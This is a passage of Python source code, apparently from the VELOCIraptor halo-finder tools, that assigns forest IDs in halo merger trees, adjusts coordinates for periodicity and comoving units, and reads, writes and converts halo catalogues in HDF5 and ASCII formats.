#if a halo has been processed as part of a forest as a
#result of walking the subhalo branches of a different root head
#then move on to the next object
if (halodata[j]['ForestID'][iroothead]!=-1): continue
AllRootHead = []
#begin recursively searching and setting the forest using the the roothead
AllRootHead,halodata = SetForestID(numsnaps,halodata,halodata[j]["RootHead"][iroothead],forestidval,AllRootHead)
#update forest id
forestidval+=1
if (iverbose): print("Done snap",j,time.clock()-start2)
#get the size of each forest
ForestSize=np.zeros(forestidval,dtype=int64)
for j in range(numsnaps):
if (numhalos[j]==0): continue
uniqueforest,counts=np.unique(halodata[j]['ForestID'],return_counts=True)
for icount in range(len(uniqueforest)):
ForestSize[uniqueforest[icount]-1]+=counts[icount]
if (iverbose): print("Finished processing forest size for snap",j)
start2=time.clock()
#first identify all subhalos and see if any have subhalo connections with different than their host
for j in range(numsnaps):
if (numhalos[j]==0): continue
#now with tree start at last snapshot and identify all root heads
#only look at halos that are their own root head and are not subhalos
missingforest=np.where((halodata[j]['ForestID']==-1))
rootheads=np.where((halodata[j]['ID']==halodata[j]['RootHead'])*(halodata[j]['ForestID']==-1))
subrootheads=np.where((halodata[j]['ForestID']==-1)*(halodata[j]['hostHaloID']!=-1))
if (iverbose): print("At snapshot",j," still have ",halodata[j]['ForestID'].size,len(missingforest[0]), " with no forest id ! Of which ",len(rootheads[0])," are root heads", len(subrootheads[0]),"are subhalos")
#if (iverbose and len(missingforest[0])>0): print("At snapshot",j," still have ",len(missingforest[0]), " with no forest id ! Of which ",len(rootheads[0])," are root heads", len(subrootheads[0]),"are subhalos")
if (len(subrootheads[0])>0):
for isub in subrootheads[0]:
hostid=halodata[j]['hostHaloID'][isub]
hostindex=int(hostid%TEMPORALHALOIDVAL-1)
halodata[j]['ForestID'][isub]=halodata[j]['ForestID'][hostindex]
halodata[j]['ForestLevel'][isub]=halodata[j]['ForestLevel'][hostindex]+1
#then return this
print("Done generating forest",time.clock()-start)
return ForestSize
"""
Adjust halo catalog for period, comoving coords, etc
"""
def AdjustforPeriod(numsnaps,numhalos,boxsize,hval,atime,halodata,icomove=0):
"""
Map halo positions from 0 to box size
"""
for i in range(numsnaps):
if (icomove):
boxval=boxsize/hval
else:
boxval=boxsize*atime[i]/hval
wdata=np.where(halodata[i]["Xc"]<0)
halodata[i]["Xc"][wdata]+=boxval
wdata=np.where(halodata[i]["Yc"]<0)
halodata[i]["Yc"][wdata]+=boxval
wdata=np.where(halodata[i]["Zc"]<0)
halodata[i]["Zc"][wdata]+=boxval
wdata=np.where(halodata[i]["Xc"]>boxval)
halodata[i]["Xc"][wdata]-=boxval
wdata=np.where(halodata[i]["Yc"]>boxval)
halodata[i]["Yc"][wdata]-=boxval
wdata=np.where(halodata[i]["Zc"]>boxval)
halodata[i]["Zc"][wdata]-=boxval
def AdjustComove(itocomovefromphysnumsnaps,numsnaps,numhalos,atime,halodata,igas=0,istar=0):
"""
Convert distances to/from physical from/to comoving
"""
for i in range(numsnaps):
if (numhalos[i]==0): continue
#converting from physical to comoving
if (itocomovefromphysnumsnaps==1):
fac=float(1.0/atime[i])
#converting from comoving to physical
else:
fac=float(atime[i])
if (fac==1): continue
#convert physical distances
halodata[i]["Xc"]*=fac
halodata[i]["Yc"]*=fac
halodata[i]["Zc"]*=fac
halodata[i]["Xcmbp"]*=fac
halodata[i]["Ycmbp"]*=fac
halodata[i]["Zcmbp"]*=fac
#sizes
halodata[i]["Rvir"]*=fac
halodata[i]["R_size"]*=fac
halodata[i]["R_200mean"]*=fac
halodata[i]["R_200crit"]*=fac
halodata[i]["R_BN97"]*=fac
halodata[i]["Rmax"]*=fac
halodata[i]["R_HalfMass"]*=fac
#if gas
if (igas):
halodata[i]["Xc_gas"]*=fac
halodata[i]["Yc_gas"]*=fac
halodata[i]["Zc_gas"]*=fac
halodata[i]["R_HalfMass_gas"]*=fac
#if stars
if (istar):
halodata[i]["Xc_star"]*=fac
halodata[i]["Yc_star"]*=fac
halodata[i]["Zc_star"]*=fac
halodata[i]["R_HalfMass_star"]*=fac
"""
Code to use individual snapshot files and merge them together into a full unified hdf file containing information determined from the tree
"""
def ProduceUnifiedTreeandHaloCatalog(fname,numsnaps,tree,numhalos,halodata,atime,
descripdata={'Title':'Tree and Halo catalog of sim', 'VELOCIraptor_version':1.15, 'Tree_version':1.1, 'Particle_num_threshold':20, 'Temporal_linking_length':1, 'Flag_gas':False, 'Flag_star':False, 'Flag_bh':False},
cosmodata={'Omega_m':1.0, 'Omega_b':0., 'Omega_Lambda':0., 'Hubble_param':1.0,'BoxSize':1.0, 'Sigma8':1.0},
unitdata={'UnitLength_in_Mpc':1.0, 'UnitVelocity_in_kms':1.0,'UnitMass_in_Msol':1.0, 'Flag_physical_comoving':True,'Flag_hubble_flow':False},
partdata={'Flag_gas':False, 'Flag_star':False, 'Flag_bh':False},
ibuildheadtail=0, icombinefile=1):
"""
produces a unifed HDF5 formatted file containing the full catalog plus information to walk the tree
\ref BuildTemporalHeadTail must have been called before otherwise it is called.
Code produces a file for each snapshot
The keys are the same as that contained in the halo catalog dictionary with the addition of
Num_of_snaps, and similar header info contain in the VELOCIraptor hdf files, ie Num_of_groups, Total_num_of_groups
\todo don't know if I should use multiprocessing here to write files in parallel. IO might not be ideal
"""
if (ibuildheadtail==1):
BuildTemporalHeadTail(numsnaps,tree,numhalos,halodata)
totnumhalos=sum(numhalos)
if (icombinefile==1):
hdffile=h5py.File(fname+".snap.hdf.data",'w')
headergrp=hdffile.create_group("Header")
#store useful information such as number of snapshots, halos,
#cosmology (Omega_m,Omega_b,Hubble_param,Omega_Lambda, Box size)
#units (Physical [1/0] for physical/comoving flag, length in Mpc, km/s, solar masses, Gravity
#and TEMPORALHALOIDVAL used to traverse tree information (converting halo ids to haloindex or snapshot), Reverse_order [1/0] for last snap listed first)
#set the attributes of the header
headergrp.attrs["NSnaps"]=numsnaps
#overall description
#simulation box size
#cosmological params
cosmogrp=headergrp.create_group("Cosmology")
for key in cosmodata.keys():
cosmogrp.attrs[key]=cosmodata[key]
#unit params
unitgrp=headergrp.create_group("Units")
for key in unitdata.keys():
unitgrp.attrs[key]=unitdata[key]
#particle types
partgrp=headergrp.create_group("Parttypes")
partgrp.attrs["Flag_gas"]=descripdata["Flag_gas"]
partgrp.attrs["Flag_star"]=descripdata["Flag_star"]
partgrp.attrs["Flag_bh"]=descripdata["Flag_bh"]
for i in range(numsnaps):
snapgrp=hdffile.create_group("Snap_%03d"%(numsnaps-1-i))
snapgrp.attrs["Snapnum"]=(numsnaps-1-i)
snapgrp.attrs["NHalos"]=numhalos[i]
snapgrp.attrs["scalefactor"]=atime[i]
for key in halodata[i].keys():
snapgrp.create_dataset(key,data=halodata[i][key])
hdffile.close()
else:
for i in range(numsnaps):
hdffile=h5py.File(fname+".snap_%03d.hdf.data"%(numsnaps-1-i),'w')
hdffile.create_dataset("Snap_value",data=np.array([numsnaps-1-i],dtype=np.uint32))
hdffile.create_dataset("NSnaps",data=np.array([numsnaps],dtype=np.uint32))
hdffile.create_dataset("NHalos",data=np.array([numhalos[i]],dtype=np.uint64))
hdffile.create_dataset("TotalNHalos",data=np.array([totnumhalos],dtype=np.uint64))
hdffile.create_dataset("scalefactor",data=np.array([atime[i]],dtype=np.float64))
for key in halodata[i].keys():
hdffile.create_dataset(key,data=halodata[i][key])
hdffile.close()
hdffile=h5py.File(fname+".tree.hdf.data",'w')
hdffile.create_dataset("NSnaps",data=np.array([numsnaps],dtype=np.uint32))
hdffile.create_dataset("TotalNHalos",data=np.array([totnumhalos],dtype=np.uint64))
hdffile.create_dataset("NHalos",data=np.array([numhalos],dtype=np.uint64))
for i in range(numsnaps):
snapgrp=hdffile.create_group("Snap_%03d"%(numsnaps-1-i))
for key in tree[i].keys():
"""
#to be completed for progenitor list
if (key=="Progen"):
for j in range(numhalos[i]):
halogrp=snapgrp.create_group("Halo"+str(j))
halogrp.create_dataset(key,data=tree[i][key][j])
else:
snapgrp.create_dataset(key,data=tree[i][key])
"""
if ((key=="Progen") | (key=="Descen")): continue
snapgrp.create_dataset(key,data=tree[i][key])
hdffile.close()
def ProduceCombinedUnifiedTreeandHaloCatalog(fname,numsnaps,tree,numhalos,halodata,atime,
descripdata={'Title':'Tree and Halo catalog of sim', 'VELOCIraptor_version':1.15, 'Tree_version':1.1, 'Particle_num_threshold':20, 'Temporal_linking_length':1, 'Flag_gas':False, 'Flag_star':False, 'Flag_bh':False},
cosmodata={'Omega_m':1.0, 'Omega_b':0., 'Omega_Lambda':0., 'Hubble_param':1.0,'BoxSize':1.0, 'Sigma8':1.0},
unitdata={'UnitLength_in_Mpc':1.0, 'UnitVelocity_in_kms':1.0,'UnitMass_in_Msol':1.0, 'Flag_physical_comoving':True,'Flag_hubble_flow':False},
partdata={'Flag_gas':False, 'Flag_star':False, 'Flag_bh':False},
ibuildheadtail=0,ibuildmajormergers=0, TEMPORALHALOIDVAL=1000000000000):
"""
produces a unifed HDF5 formatted file containing the full catalog plus information to walk the tree
#ref BuildTemporalHeadTail must have been called before otherwise it is called.
Code produces a file for each snapshot
The keys are the same as that contained in the halo catalog dictionary with the addition of
Num_of_snaps, and similar header info contain in the VELOCIraptor hdf files, ie Num_of_groups, Total_num_of_groups
#todo don't know if I should use multiprocessing here to write files in parallel. IO might not be ideal
Here the halodata is the dictionary contains the information
"""
if (ibuildheadtail==1):
BuildTemporalHeadTail(numsnaps,tree,numhalos,halodata)
if (ibuildmajormergers==1):
IdentifyMergers(numsnaps,tree,numhalos,halodata,boxsize,hval,atime)
hdffile=h5py.File(fname+".snap.hdf.data",'w')
headergrp=hdffile.create_group("Header")
#store useful information such as number of snapshots, halos,
#cosmology (Omega_m,Omega_b,Hubble_param,Omega_Lambda, Box size)
#units (Physical [1/0] for physical/comoving flag, length in Mpc, km/s, solar masses, Gravity
#and TEMPORALHALOIDVAL used to traverse tree information (converting halo ids to haloindex or snapshot), Reverse_order [1/0] for last snap listed first)
#set the attributes of the header
headergrp.attrs["NSnaps"]=numsnaps
#overall description
headergrp.attrs["Title"]=descripdata["Title"]
#simulation box size
headergrp.attrs["BoxSize"]=cosmodata["BoxSize"]
findergrp=headergrp.create_group("HaloFinder")
findergrp.attrs["Name"]="VELOCIraptor"
findergrp.attrs["Version"]=descripdata["VELOCIraptor_version"]
findergrp.attrs["Particle_num_threshold"]=descripdata["Particle_num_threshold"]
treebuildergrp=headergrp.create_group("TreeBuilder")
treebuildergrp.attrs["Name"]="VELOCIraptor-Tree"
treebuildergrp.attrs["Version"]=descripdata["Tree_version"]
treebuildergrp.attrs["Temporal_linking_length"]=descripdata["Temporal_linking_length"]
#cosmological params
cosmogrp=headergrp.create_group("Cosmology")
for key in cosmodata.keys():
if (key!='BoxSize'): cosmogrp.attrs[key]=cosmodata[key]
#unit params
unitgrp=headergrp.create_group("Units")
for key in unitdata.keys():
unitgrp.attrs[key]=unitdata[key]
#particle types
partgrp=headergrp.create_group("Parttypes")
partgrp.attrs["Flag_gas"]=descripdata["Flag_gas"]
partgrp.attrs["Flag_star"]=descripdata["Flag_star"]
partgrp.attrs["Flag_bh"]=descripdata["Flag_bh"]
#now have finished with header
#now need to create groups for halos and then a group containing tree information
snapsgrp=hdffile.create_group("Snapshots")
#internal tree keys
treekeys=["RootHead", "RootHeadSnap", "Head", "HeadSnap", "Tail", "TailSnap", "RootTail", "RootTailSnap", "Num_progen"]
for i in range(numsnaps):
#note that I normally have information in reverse order so that might be something in the units
snapgrp=snapsgrp.create_group("Snap_%03d"%(numsnaps-1-i))
snapgrp.attrs["Snapnum"]=i
snapgrp.attrs["NHalos"]=numhalos[i]
snapgrp.attrs["scalefactor"]=atime[i]
#now close file and use the pytables interface so as to write the table
hdffile.close()
#now write tables using pandas interface
for i in range(numsnaps):
#lets see if we can alter the code to write a table
keys=halodata[i].keys()
#remove tree keys
for tkey in treekeys: keys.remove(tkey)
#make temp dict
dictval=dict()
for key in keys:
dictval[key]=halodata[i][key]
#make a pandas DataFrame using halo dictionary
df=pd.DataFrame.from_dict(dictval)
df.to_hdf(fname+".snap.hdf.data","Snapshots/Snap_%03d/Halos"%(numsnaps-1-i), format='table', mode='a')
#reopen with h5py interface
hdffile=h5py.File(fname+".snap.hdf.data",'a')
#then write tree information in separate group
treegrp=hdffile.create_group("MergerTree")
#Tree group should contain
"""
HaloSnapID
HaloSnapNum
HaloSnapIndex
ProgenitorIndex
ProgenitorSnapnum
ProgenitorID
DescendantIndex
..
..
RootProgenitorIndex
..
..
RootDescendantIndex
"""
#to save on memory, allocate each block separately
#store halo information
tothalos=sum(numhalos)
tdata=np.zeros(tothalos,dtype=halodata[0]["ID"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["ID"]
count+=int(numhalos[i])
treegrp.create_dataset("HaloSnapID",data=tdata)
tdata=np.zeros(tothalos,dtype=np.uint32)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=i
count+=int(numhalos[i])
treegrp.create_dataset("HaloSnapNum",data=tdata)
tdata=np.zeros(tothalos,dtype=np.uint64)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=range(int(numhalos[i]))
count+=int(numhalos[i])
treegrp.create_dataset("HaloSnapIndex",data=tdata)
#store progenitors
tdata=np.zeros(tothalos,dtype=halodata[0]["Tail"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["Tail"]
count+=int(numhalos[i])
treegrp.create_dataset("ProgenitorID",data=tdata)
tdata=np.zeros(tothalos,dtype=halodata[0]["TailSnap"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["TailSnap"]
count+=int(numhalos[i])
treegrp.create_dataset("ProgenitorSnapnum",data=tdata)
tdata=np.zeros(tothalos,dtype=np.uint64)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=(halodata[i]["Tail"]%TEMPORALHALOIDVAL-1)
count+=int(numhalos[i])
treegrp.create_dataset("ProgenitorIndex",data=tdata)
#store descendants
tdata=np.zeros(tothalos,dtype=halodata[0]["Head"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["Head"]
count+=int(numhalos[i])
treegrp.create_dataset("DescendantID",data=tdata)
tdata=np.zeros(tothalos,dtype=halodata[0]["HeadSnap"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["HeadSnap"]
count+=int(numhalos[i])
treegrp.create_dataset("DescendantSnapnum",data=tdata)
tdata=np.zeros(tothalos,dtype=np.uint64)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=(halodata[i]["Head"]%TEMPORALHALOIDVAL-1)
count+=int(numhalos[i])
treegrp.create_dataset("DescendantIndex",data=tdata)
#store progenitors
tdata=np.zeros(tothalos,dtype=halodata[0]["RootTail"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["RootTail"]
count+=int(numhalos[i])
treegrp.create_dataset("RootProgenitorID",data=tdata)
tdata=np.zeros(tothalos,dtype=halodata[0]["RootTailSnap"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["RootTailSnap"]
count+=int(numhalos[i])
treegrp.create_dataset("RootProgenitorSnapnum",data=tdata)
tdata=np.zeros(tothalos,dtype=np.uint64)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=(halodata[i]["RootTail"]%TEMPORALHALOIDVAL-1)
count+=int(numhalos[i])
treegrp.create_dataset("RootProgenitorIndex",data=tdata)
#store descendants
tdata=np.zeros(tothalos,dtype=halodata[0]["RootHead"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["RootHead"]
count+=int(numhalos[i])
treegrp.create_dataset("RootDescendantID",data=tdata)
tdata=np.zeros(tothalos,dtype=halodata[0]["RootHeadSnap"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["RootHeadSnap"]
count+=int(numhalos[i])
treegrp.create_dataset("RootDescendantSnapnum",data=tdata)
tdata=np.zeros(tothalos,dtype=np.uint64)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=(halodata[i]["RootHead"]%TEMPORALHALOIDVAL-1)
count+=int(numhalos[i])
treegrp.create_dataset("RootDescendantIndex",data=tdata)
#store number of progenitors
tdata=np.zeros(tothalos,dtype=np.uint32)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["Num_progen"]
count+=int(numhalos[i])
treegrp.create_dataset("NProgen",data=tdata)
hdffile.close()
def ReadUnifiedTreeandHaloCatalog(fname, desiredfields=[], icombinedfile=1,iverbose=1):
"""
Read Unified Tree and halo catalog from HDF file with base filename fname.
Parameters
----------
Returns
-------
"""
if (icombinedfile):
hdffile=h5py.File(fname+".snap.hdf.data",'r')
#load data sets containing number of snaps
headergrpname="Header/"
numsnaps=hdffile[headergrpname].attrs["NSnaps"]
#allocate memory
halodata=[dict() for i in range(numsnaps)]
numhalos=[0 for i in range(numsnaps)]
atime=[0 for i in range(numsnaps)]
tree=[[] for i in range(numsnaps)]
cosmodata=dict()
unitdata=dict()
#load cosmology data
cosmogrpname="Cosmology/"
fieldnames=[str(n) for n in hdffile[headergrpname+cosmogrpname].attrs.keys()]
for fieldname in fieldnames:
cosmodata[fieldname]=hdffile[headergrpname+cosmogrpname].attrs[fieldname]
#load unit data
unitgrpname="Units/"
fieldnames=[str(n) for n in hdffile[headergrpname+unitgrpname].attrs.keys()]
for fieldname in fieldnames:
unitdata[fieldname]=hdffile[headergrpname+unitgrpname].attrs[fieldname]
#for each snap load the appropriate group
start=time.clock()
for i in range(numsnaps):
snapgrpname="Snap_%03d/"%(numsnaps-1-i)
if (iverbose==1):
print("Reading ",snapgrpname)
isnap=hdffile[snapgrpname].attrs["Snapnum"]
atime[isnap]=hdffile[snapgrpname].attrs["scalefactor"]
numhalos[isnap]=hdffile[snapgrpname].attrs["NHalos"]
if (len(desiredfields)>0):
fieldnames=desiredfields
else:
fieldnames=[str(n) for n in hdffile[snapgrpname].keys()]
for catvalue in fieldnames:
halodata[isnap][catvalue]=np.array(hdffile[snapgrpname+catvalue])
hdffile.close()
print("read halo data ",time.clock()-start)
else :
hdffile=h5py.File(fname+".snap_000.hdf.data",'r')
numsnaps=int(hdffile["NSnaps"][0])
#get field names
fieldnames=[str(n) for n in hdffile.keys()]
#clean of header info
fieldnames.remove("Snapnum")
fieldnames.remove("NSnaps")
fieldnames.remove("NHalos")
fieldnames.remove("TotalNHalos")
fieldnames.remove("scalefactor")
if (len(desiredfields)>0):
fieldnames=desiredfields
hdffile.close()
halodata=[[] for i in range(numsnaps)]
numhalos=[0 for i in range(numsnaps)]
atime=[0 for i in range(numsnaps)]
tree=[[] for i in range(numsnaps)]
start=time.clock()
for i in range(numsnaps):
hdffile=h5py.File(fname+".snap_%03d.hdf.data"%(numsnaps-1-i),'r')
atime[i]=(hdffile["scalefactor"])[0]
numhalos[i]=(hdffile["NHalos"])[0]
halodata[i]=dict()
for catvalue in fieldnames:
halodata[i][catvalue]=np.array(hdffile[catvalue])
hdffile.close()
print("read halo data ",time.clock()-start)
#lets ignore the tree file for now
for i in range(numsnaps):
tree[i]=dict()
return atime,tree,numhalos,halodata,cosmodata,unitdata
if (icombinedfile==1):
hdffile=h5py.File(fname+".tree.hdf.data",'r')
treefields=["haloID", "Num_progen"]
#do be completed for Progenitor list although information is contained in the halo catalog by searching for things with the same head
#treefields=["haloID", "Num_progen", "Progen"]
for i in range(numsnaps):
snapgrpname="Snap_%03d/"%(numsnaps-1-i)
tree[i]=dict()
for catvalue in treefields:
"""
if (catvalue==treefields[-1]):
tree[i][catvalue]=[[]for j in range(numhalos[i])]
for j in range(numhalos[i]):
halogrpname=snapgrpname+"/Halo"+str(j)
tree[i][catvalue]=np.array(hdffile[halogrpname+catvalue])
else:
tree[i][catvalue]=np.array(hdffile[snapgrpname+catvalue])
"""
tree[i][catvalue]=np.array(hdffile[snapgrpname+catvalue])
hdffile.close()
return atime,tree,numhalos,halodata,cosmodata,unitdata
def ProduceHDFTree(fname,numsnaps,tree,numhalos,halodata,atime,
descripdata={'Title':'Tree catalogue', 'VELOCIraptor_version':1.3, 'Tree_version':1.1, 'Particle_num_threshold':20, 'Temporal_linking_length':1, 'Flag_gas':False, 'Flag_star':False, 'Flag_bh':False}
):
"""
Produces a HDF5 formatted file containing Reduced Tree information,
ie; RootHead, Head, HeadSnap, Tail, RootTail, etc.
Parameters
----------
fname : string
filename of the hdf file to be written
numsnaps : int
the number of snapshots
tree : dict
the tree data
numhalos : array
array of number of halos per snapshot
halodata : dict
the halo data dictionary
atime : array
array of scalefactors/times of the snaphots
discrptdata : dict
stores a description of how the tree catalogue was produced
Returns
-------
void :
Only writes an hdf file. Nothing is returned.
"""
hdffile=h5py.File(fname,'w')
headergrp=hdffile.create_group("Header")
#store useful information such as number of snapshots, halos,
#cosmology (Omega_m,Omega_b,Hubble_param,Omega_Lambda, Box size)
#units (Physical [1/0] for physical/comoving flag, length in Mpc, km/s, solar masses, Gravity
#and TEMPORALHALOIDVAL used to traverse tree information (converting halo ids to haloindex or snapshot), Reverse_order [1/0] for last snap listed first)
#set the attributes of the header
headergrp.attrs["NSnaps"]=numsnaps
#overall description
headergrp.attrs["Title"]=descripdata["Title"]
findergrp=headergrp.create_group("HaloFinder")
findergrp.attrs["Name"]="VELOCIraptor"
findergrp.attrs["Version"]=descripdata["VELOCIraptor_version"]
findergrp.attrs["Particle_num_threshold"]=descripdata["Particle_num_threshold"]
treebuildergrp=headergrp.create_group("TreeBuilder")
treebuildergrp.attrs["Name"]="VELOCIraptor-Tree"
treebuildergrp.attrs["Version"]=descripdata["Tree_version"]
treebuildergrp.attrs["Temporal_linking_length"]=descripdata["Temporal_linking_length"]
#now need to create groups for halos and then a group containing tree information
snapsgrp=hdffile.create_group("Snapshots")
#internal tree keys
halokeys=["RootHead", "RootHeadSnap", "Head", "HeadSnap", "Tail", "TailSnap", "RootTail", "RootTailSnap", "ID", "Num_progen"]
for i in range(numsnaps):
#note that I normally have information in reverse order so that might be something in the units
snapgrp=snapsgrp.create_group("Snap_%03d"%i)
snapgrp.attrs["Snapnum"]=i
snapgrp.attrs["NHalos"]=numhalos[i]
snapgrp.attrs["scalefactor"]=atime[i]
for key in halokeys:
snapgrp.create_dataset(key,data=halodata[i][key])
hdffile.close()
"""
Conversion Tools
"""
def ConvertASCIIPropertyFileToHDF(basefilename,iseparatesubfiles=0,iverbose=0):
"""
Reads an ASCII file and converts it to the HDF format for VELOCIraptor properties files
"""
inompi=True
if (iverbose): print("reading properties file and converting to hdf",basefilename,os.path.isfile(basefilename))
filename=basefilename+".properties"
#load header
if (os.path.isfile(basefilename)==True):
numfiles=0
else:
filename=basefilename+".properties"+".0"
inompi=False
if (os.path.isfile(filename)==False):
print("file not found")
return []
byteoffset=0
#load ascii file
halofile = open(filename, 'r')
#read header information
[filenum,numfiles]=halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
[numhalos, numtothalos]= halofile.readline().split()
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
names = ((halofile.readline())).split()
#remove the brackets in ascii file names
fieldnames= [fieldname.split("(")[0] for fieldname in names]
halofile.close()
for ifile in range(numfiles):
if (inompi==True):
filename=basefilename+".properties"
hdffilename=basefilename+".hdf.properties"
else:
filename=basefilename+".properties"+"."+str(ifile)
hdffilename=basefilename+".hdf.properties"+"."+str(ifile)
if (iverbose) : print("reading ",filename)
halofile = open(filename, 'r')
hdffile=h5py.File(hdffilename,'w')
[filenum,numfiles]=halofile.readline().split()
[numhalos, numtothalos]= halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
#write header info
hdffile.create_dataset("File_id",data=np.array([filenum]))
hdffile.create_dataset("Num_of_files",data=np.array([numfiles]))
hdffile.create_dataset("Num_of_groups",data=np.array([numhalos]));
hdffile.create_dataset("Total_num_of_groups",data=np.array([numtothalos]));
halofile.close()
if (numhalos>0): htemp = np.loadtxt(filename,skiprows=3).transpose()
else: htemp=[[]for ikeys in range(len(fieldnames))]
for ikeys in range(len(fieldnames)):
if (fieldnames[ikeys]=="ID"):
hdffile.create_dataset(fieldnames[ikeys],data=np.array(htemp[ikeys],dtype=np.uint64))
elif (fieldnames[ikeys]=="ID_mbp"):
hdffile.create_dataset(fieldnames[ikeys],data=np.array(htemp[ikeys],dtype=np.int64))
elif (fieldnames[ikeys]=="hostHaloID"):
hdffile.create_dataset(fieldnames[ikeys],data=np.array(htemp[ikeys],dtype=np.int64))
elif fieldnames[ikeys] in ["numSubStruct","npart","n_gas","n_star"]:
hdffile.create_dataset(fieldnames[ikeys],data=np.array(htemp[ikeys], dtype=np.uint64))
else:
hdffile.create_dataset(fieldnames[ikeys],data=np.array(htemp[ikeys], dtype=np.float64))
hdffile.close()
#if subhalos are written in separate files, then read them too
if (iseparatesubfiles==1):
for ifile in range(numfiles):
if (inompi==True):
filename=basefilename+".sublevels"+".properties"
hdffilename=basefilename+".hdf"+".sublevels"+".properties"
else:
filename=basefilename+".sublevels"+".properties"+"."+str(ifile)
hdffilename=basefilename+".hdf"+".sublevels"+".properties"+"."+str(ifile)
if (iverbose) : print("reading ",filename)
halofile = open(filename, 'r')
hdffile=h5py.File(hdffilename,'w')
[filenum,numfiles]=halofile.readline().split()
[numhalos, numtothalos]= halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
#write header info
hdffile.create_dataset("File_id",data=np.array([filenum]))
hdffile.create_dataset("Num_of_files",data=np.array([numfiles]))
hdffile.create_dataset("Num_of_groups",data=np.array([numhalos]));
hdffile.create_dataset("Total_num_of_groups",data=np.array([numtothalos]));
halofile.close()
if (numhalos>0): htemp = np.loadtxt(filename,skiprows=3).transpose()
else: htemp=[[]for ikeys in range(len(fieldnames))]
for ikeys in range(len(fieldnames)):
if (fieldnames[ikeys]=="ID"):
hdffile.create_dataset(fieldnames[ikeys],data=np.array(htemp[ikeys],dtype=np.uint64))
elif (fieldnames[ikeys]=="ID_mbp"):
hdffile.create_dataset(fieldnames[ikeys],data=np.array(htemp[ikeys],dtype=np.int64))
elif (fieldnames[ikeys]=="hostHaloID"):
hdffile.create_dataset(fieldnames[ikeys],data=np.array(htemp[ikeys],dtype=np.int64))
elif fieldnames[ikeys] in ["numSubStruct","npart","n_gas","n_star"]:
hdffile.create_dataset(fieldnames[ikeys],data=np.array(htemp[ikeys], dtype=np.uint64))
else:
hdffile.create_dataset(fieldnames[ikeys],data=np.array(htemp[ikeys], dtype=np.float64))
hdffile.close()
def ConvertASCIICatalogGroupsFileToHDF(basefilename,iseparatesubfiles=0,iverbose=0):
"""
Reads an ASCII file and converts it to the HDF format for VELOCIraptor files
"""
inompi=True
if (iverbose): print("reading properties file and converting to hdf",basefilename,os.path.isfile(basefilename))
filename=basefilename+".catalog_groups"
#load header
if (os.path.isfile(basefilename)==True):
numfiles=0
else:
filename=basefilename+".catalog_groups"+".0"
inompi=False
if (os.path.isfile(filename)==False):
print("file not found")
return []
byteoffset=0
#load ascii file
halofile = open(filename, 'r')
#read header information
[filenum,numfiles]=halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
[numhalos, numtothalos]= halofile.readline().split()
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
halofile.close()
fieldnames=["Group_Size","Offset","Offset_unbound","Number_of_substructures_in_halo","Parent_halo_ID"]
fieldtype=[np.uint32,np.uint64,np.uint64,np.uint32,np.int64]
for ifile in range(numfiles):
if (inompi==True):
filename=basefilename+".catalog_groups"
hdffilename=basefilename+".hdf.catalog_groups"
else:
filename=basefilename+".catalog_groups"+"."+str(ifile)
hdffilename=basefilename+".hdf.catalog_groups"+"."+str(ifile)
if (iverbose) : print("reading ",filename)
halofile = open(filename, 'r')
hdffile=h5py.File(hdffilename,'w')
[filenum,numfiles]=halofile.readline().split()
[numhalos, numtothalos]= halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
#write header info
hdffile.create_dataset("File_id",data=np.array([filenum]))
hdffile.create_dataset("Num_of_files",data=np.array([numfiles]))
hdffile.create_dataset("Num_of_groups",data=np.array([numhalos]));
hdffile.create_dataset("Total_num_of_groups",data=np.array([numtothalos]));
halofile.close()
if (numhalos>0):
#will look like one dimensional array of values split into
#"Group_Size"
#"Offset"
#"Offset_unbound"
#"Number_of_substructures_in_halo"
#"Parent_halo_ID"
#each of size numhalos
cattemp = np.loadtxt(filename,skiprows=2).transpose()
for ikeys in range(len(fieldnames)):
hdffile.create_dataset(fieldnames[ikeys],data=np.array(cattemp[ikeys*numhalos:(ikeys+1)*numhalos],dtype=fieldtype[ikeys]))
else:
cattemp=[]
for ikeys in range(len(fieldnames)):
hdffile.create_dataset(fieldnames[ikeys],data=np.array([],dtype=fieldtype[ikeys]))
hdffile.close()
#if subhalos are written in separate files, then read them too
if (iseparatesubfiles==1):
for ifile in range(numfiles):
if (inompi==True):
filename=basefilename+".sublevels"+".catalog_groups"
hdffilename=basefilename+".hdf"+".sublevels"+".catalog_groups"
else:
filename=basefilename+".sublevels"+".catalog_groups"+"."+str(ifile)
hdffilename=basefilename+".hdf"+".sublevels"+".catalog_groups"+"."+str(ifile)
if (iverbose) : print("reading ",filename)
halofile = open(filename, 'r')
hdffile=h5py.File(hdffilename,'w')
[filenum,numfiles]=halofile.readline().split()
[numhalos, numtothalos]= halofile.readline().split()
